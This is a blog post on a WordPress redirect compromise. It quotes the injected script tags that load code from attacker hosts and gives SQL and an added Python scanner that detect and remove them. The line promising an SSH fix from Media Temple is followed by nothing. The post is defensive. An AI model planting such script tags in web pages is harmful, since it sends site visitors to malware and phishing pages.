WordPress Redirect Exploit

Recently a large number of web sites were compromised in a subtle redirection attack. By some unknown means the attacker gains access to your WordPress database and inserts some JavaScript at the end of every post. This code loads from an external site; on the first load it sets a cookie and then redirects the visitor to a “virus” phishing site which attempts to install malicious software on the user’s computer. Subsequent visits to the site are transparent because of the cookie, although the script still runs. If you search through the source code you may find a variation of the following code:

  • <script src="http://ae.awaue.com/7"></script>
  • <script src="ie.eracou.com/3"></script>
  • <script src="ao.euuaw.com/9"></script>

This exploit has been noted by Media Temple, who appears to have been targeted. Although they claim their servers are secure, the cause is currently unknown.

This script will have been inserted into every post. It can be cleaned by hand, but you would have to open each post in HTML mode and remove the code from the end. A cleaner approach is to use phpMyAdmin (or another method) to run the following SQL (or a variation to account for different URLs):

  • update wp_posts set post_content = replace(post_content,'<script src="http://ae.awaue.com/7"></script>','');
  • update wp_posts set post_content = replace(post_content,'<script src="ie.eracou.com/3"></script>','');
  • update wp_posts set post_content = replace(post_content,'<script src="http://ao.euuaw.com/9"></script>','');
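The statements above only match one exact tag each, so a variant with or without the http:// scheme, or a different subdomain, slips past them. Here is an added Python example (not from the original post or from Media Temple) that scans constructed sample rows standing in for wp_posts, reports which posts carry a script tag pointing at the hosts named above, strips only those tags, and builds the same UPDATE ... REPLACE() statement shown above for each exact tag it finds.

```python
import re

# Constructed sample rows mimicking (ID, post_content) from wp_posts; not real site data.
SAMPLE_POSTS = [
    (1, 'Hello world.<script src="http://ae.awaue.com/7"></script>'),
    (2, 'Second post.<script src="ie.eracou.com/3"></script>'),
    (3, 'Clean post with a legit embed <script src="https://example.com/widget.js"></script>'),
    (4, 'Also clean.'),
]

# The hosts named in the write-up; matched with or without the http:// scheme.
KNOWN_BAD_HOSTS = ("ae.awaue.com", "ie.eracou.com", "ao.euuaw.com")

# Matches <script src="..."></script>; group 1 is the host, group 2 the optional path.
SCRIPT_TAG_RE = re.compile(
    r'<script\s+src=["\'](?:https?://)?([^"\'/]+)(/[^"\']*)?["\']\s*>\s*</script>',
    re.IGNORECASE,
)

def find_injected_tags(content, bad_hosts=KNOWN_BAD_HOSTS):
    """Return (host, full_tag) pairs for script tags that load from a known-bad host."""
    hits = []
    for m in SCRIPT_TAG_RE.finditer(content):
        host = m.group(1).lower()
        if host in bad_hosts:
            hits.append((host, m.group(0)))
    return hits

def clean_post(content, bad_hosts=KNOWN_BAD_HOSTS):
    """Remove every injected tag while leaving legitimate script tags untouched."""
    def _strip(m):
        return "" if m.group(1).lower() in bad_hosts else m.group(0)
    return SCRIPT_TAG_RE.sub(_strip, content)

def scan_posts(posts, bad_hosts=KNOWN_BAD_HOSTS):
    """Return {post_id: [hosts]} for every post that carries an injected tag."""
    report = {}
    for post_id, content in posts:
        hits = find_injected_tags(content, bad_hosts)
        if hits:
            report[post_id] = [host for host, _ in hits]
    return report

def sql_for_tag(tag, table="wp_posts"):
    """Build the same UPDATE ... REPLACE() statement the write-up uses, for one exact tag."""
    escaped = tag.replace("'", "''")  # the tags use double quotes; escape single quotes anyway
    return f"update {table} set post_content = replace(post_content,'{escaped}','');"

if __name__ == "__main__":
    for post_id, hosts in scan_posts(SAMPLE_POSTS).items():
        print(f"post {post_id}: injected script from {', '.join(hosts)}")
```

Run the scan against a dump of post_content first and review the report; only then apply the generated statements, since a REPLACE() that misses a variant leaves the redirect in place.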

Media Temple has also provided a fix via SSH as follows:

If you would like assistance in resolving this issue send me a message using the contact form. I am available for limited consulting free of charge or can resolve this issue for a small fee.

For more information you can read the following articles:

http://digwp.com/2010/07/media-temple-wordpress-hack/

http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit